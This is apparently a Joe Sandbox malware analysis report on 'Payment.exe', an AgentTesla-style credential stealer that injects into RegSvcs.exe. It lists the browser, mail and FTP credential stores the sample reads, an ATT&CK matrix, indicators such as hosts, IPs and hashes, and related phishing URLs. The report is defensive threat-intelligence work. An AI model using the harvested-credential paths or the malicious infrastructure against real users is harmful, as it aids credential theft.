                    Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B281F7
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B34C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B34C03
                    Source: Payment.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Payment.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF886B cpuid 0_2_00AF886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B050D7
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B12230 GetUserNameW,0_2_00B12230
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B0418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B0418A
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AD4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Payment.exe.2150000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3389464276.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 3924, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5648, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Payment.exeBinary or memory string: WIN_81
                    Source: Payment.exeBinary or memory string: WIN_XP
                    Source: Payment.exeBinary or memory string: WIN_XPe
                    Source: Payment.exeBinary or memory string: WIN_VISTA
                    Source: Payment.exeBinary or memory string: WIN_7
                    Source: Payment.exeBinary or memory string: WIN_8
                    Source: Payment.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 0.2.Payment.exe.2150000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3389464276.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 3924, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5648, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Payment.exe.2150000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3389464276.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 3924, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5648, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B46596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B46596
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B46A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B46A5A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    121
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS38
                    System Information Discovery
                    Distributed Component Object Model121
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    2
                    Valid Accounts
                    LSA Secrets141
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials121
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Access Token Manipulation
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Payment.exe43%ReversingLabsWin32.Spyware.Negasteal
                    Payment.exe37%VirustotalBrowse
                    Payment.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    bg.microsoft.map.fastly.net0%VirustotalBrowse
                    fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                    smtp.italiacanda-it.com4%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://smtp.italiacanda-it.com0%Avira URL Cloudsafe
                    http://smtp.italiacanda-it.com4%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    199.232.214.172
                    truefalseunknown
                    us2.smtp.mailhostbox.com
                    208.91.198.143
                    truefalse
                      high
                      api.ipify.org
                      104.26.12.205
                      truefalse
                        high
                        fp2e7a.wpc.phicdn.net
                        192.229.211.108
                        truefalseunknown
                        smtp.italiacanda-it.com
                        unknown
                        unknowntrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgPayment.exe, 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/Payment.exe, 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              http://smtp.italiacanda-it.comRegSvcs.exe, 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 4%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.org/tRegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    208.91.198.143
                                    us2.smtp.mailhostbox.comUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                    104.26.12.205
                                    api.ipify.orgUnited States
                                    13335CLOUDFLARENETUSfalse
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1432021
                                    Start date and time:2024-04-26 10:05:12 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 22s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Payment.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/4@4/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 57
                                    • Number of non-executed functions: 267
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    10:06:17API Interceptor39x Sleep call for process: RegSvcs.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    208.91.198.143HDPESDR11OD5606METERS.exeGet hashmaliciousAgentTeslaBrowse
                                      HDPESDR1145-6METERS.exeGet hashmaliciousAgentTeslaBrowse
                                        TT copy of the first payment.exeGet hashmaliciousAgentTeslaBrowse
                                          rTDN001-180424_PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            1iO53raUh69l6nV.exeGet hashmaliciousAgentTeslaBrowse
                                              HmGUCvTQIacWu7Q.exeGet hashmaliciousAgentTeslaBrowse
                                                Payment.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                  Gcerti Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                    Syknivkloo.exeGet hashmaliciousAgentTeslaBrowse
                                                      CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                        104.26.12.205Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                        • api.ipify.org/?format=json
                                                        Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                        • api.ipify.org/?format=json
                                                        SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                        • api.ipify.org/
                                                        lods.cmdGet hashmaliciousRemcosBrowse
                                                        • api.ipify.org/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        us2.smtp.mailhostbox.comSecuriteInfo.com.Win32.PWSX-gen.29608.5434.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 208.91.199.224
                                                        Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        PR2403016.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        OKJ2402PRT000025.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        Urgent PO 18-3081 Confirmation.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        HDPESDR11OD5606METERS.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        HDPESDR1145-6METERS.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.225
                                                        TT copy of the first payment.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        rTDN001-180424_PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 208.91.198.143
                                                        1iO53raUh69l6nV.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        fp2e7a.wpc.phicdn.nethttps://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQmGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.229.211.108
                                                        https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        https://farolcontabilidade.com/secure/securehtm/securehtm/?uid=vxyz@conde.jp.comGet hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        http://householdshop.club/Get hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        http://gmial.com/Get hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        SWIFT.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 192.229.211.108
                                                        https://4yu76uyd4.best/ccon/Get hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        http://callumsyed.net/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 192.229.211.108
                                                        https://shorturl.at/lMOT7Get hashmaliciousUnknownBrowse
                                                        • 192.229.211.108
                                                        api.ipify.orgSOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        https://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.26.13.205
                                                        http://asana.wfGet hashmaliciousUnknownBrowse
                                                        • 172.67.74.152
                                                        o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 172.67.74.152
                                                        http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.12.205
                                                        16770075581.zipGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        bg.microsoft.map.fastly.nethttps://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQmGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.210.172
                                                        https://4yu76uyd4.best/ccon/Get hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        https://www.xf2rnb.cn/Get hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        https://sabbynarula-73p7yyw32q-ue.a.run.app/Win0belzer0sys07/index.htmlGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        https://heiqi.xyz/Get hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        https://aulixalrrydrea.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.210.172
                                                        http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                                        • 199.232.214.172
                                                        https://c-m-c-group.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 199.232.214.172
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Win32.PWSX-gen.29608.5434.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 208.91.199.224
                                                        Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                        • 207.174.215.249
                                                        PR2403016.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                        • 207.174.215.249
                                                        OKJ2402PRT000025.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        PO82100088.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.215.248.214
                                                        Urgent PO 18-3081 Confirmation.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        72625413524.vbsGet hashmaliciousXWormBrowse
                                                        • 116.206.104.215
                                                        CLOUDFLARENETUShttps://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQmGet hashmaliciousHTMLPhisherBrowse
                                                        • 172.67.144.70
                                                        SOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        http://householdshop.club/Get hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        http://xred.site50.net/syn/SSLLibrary.dllGet hashmaliciousUnknownBrowse
                                                        • 1.1.1.1
                                                        http://tracking.theimpco.com/tracking/click?d=OrpweRVshItmHO3qVpYwg0JJ3qp4iuwmt5687ge2H9uFpmeuDd2X4dPYczAnrgigX6DFu-Km6YtBvUpjEWnC0qAPektAg_1gGuxaDYDl5nf8rOcHvuOtOBIWknNeVHzB3g2Get hashmaliciousUnknownBrowse
                                                        • 1.1.1.1
                                                        http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                                        • 104.18.28.104
                                                        http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                                        • 104.18.28.104
                                                        http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                                        • 104.18.28.104
                                                        Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 172.67.191.112
                                                        http://callumsyed.net/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 104.17.2.184
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eSOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                        • 104.26.12.205
                                                        PO-inv-CQV20(92315).exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        a.cmdGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        http://papajoeschicago.comGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.12.205
                                                        https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.26.12.205
                                                        http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                        • 104.26.12.205
                                                        Isass.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        No context
                                                        Process:C:\Users\user\Desktop\Payment.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):151716
                                                        Entropy (8bit):7.912451959234274
                                                        Encrypted:false
                                                        SSDEEP:3072:klowTzZsW2bcfOoYwabKblNLHmQRQGcdsWG7BMdxufUIzEo7o0a8Vt86l27K0nM5:k1f+7EUb4PLG67cdshOxaUIUgVtBPJH
                                                        MD5:0D495EFC25E9F16FB6F9E1389DD5D06F
                                                        SHA1:6DCE28B1908FDBD964AFD469D2F24F464F243B44
                                                        SHA-256:581E995B49006C75D1BD8DA316D306F0FA7E1F772987E482030792207C93B17C
                                                        SHA-512:703CAC22700C4D8952B0D6DF0DEF8443903523B0D7A1B605AE35766A120D2B8DE7EC71009A545CDF93AB5A9114F127B23153601AA0B9C0F4EEC3EAA2A495E797
                                                        Malicious:false
                                                        Reputation:low
